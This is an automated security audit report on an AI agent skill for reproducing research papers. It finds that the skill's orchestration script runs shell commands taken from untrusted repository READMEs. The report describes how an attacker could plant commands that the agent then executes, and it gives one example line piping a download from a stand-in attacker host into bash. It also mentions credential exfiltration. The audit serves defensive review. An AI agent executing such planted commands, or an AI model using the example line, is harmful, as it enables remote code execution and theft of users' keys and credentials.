ai-paper-reproduction

Fail

Audited by Gen Agent Trust Hub on Mar 30, 2026

Risk Level: HIGHCOMMAND_EXECUTIONREMOTE_CODE_EXECUTION
Full Analysis
  • [COMMAND_EXECUTION]: The script scripts/orchestrate_repro.py contains logic to execute shell commands extracted from the target repository's documentation.
  • Specifically, the maybe_run_command function calls subprocess.run() on a command string that originates from the repository's README.md file.
  • The choose_goal function identifies "runnable" commands from the repository and passes them to the execution logic, which can result in the execution of arbitrary shell strings.
  • [REMOTE_CODE_EXECUTION]: Since the execution targets are sourced from external and potentially untrusted code repositories, this creates a direct vector for remote code execution.
  • An attacker can place malicious shell commands inside a README.md file (e.g., curl http://attacker.com/payload | bash) in a repository.
  • The skill's primary policy of "README-first" reproduction encourages the agent to prioritize and execute these documented commands, leading to the execution of attacker-controlled code on the user's system.
  • [DATA_EXFILTRATION]: The ability to execute arbitrary commands provides a mechanism for accessing and exfiltrating sensitive local data (such as environment variables, SSH keys, or AWS credentials) to external servers controlled by an attacker who has manipulated the repository's documentation.
Recommendations
  • AI detected serious security threats
Audit Metadata
Risk Level
HIGH
Analyzed
Mar 30, 2026, 02:38 PM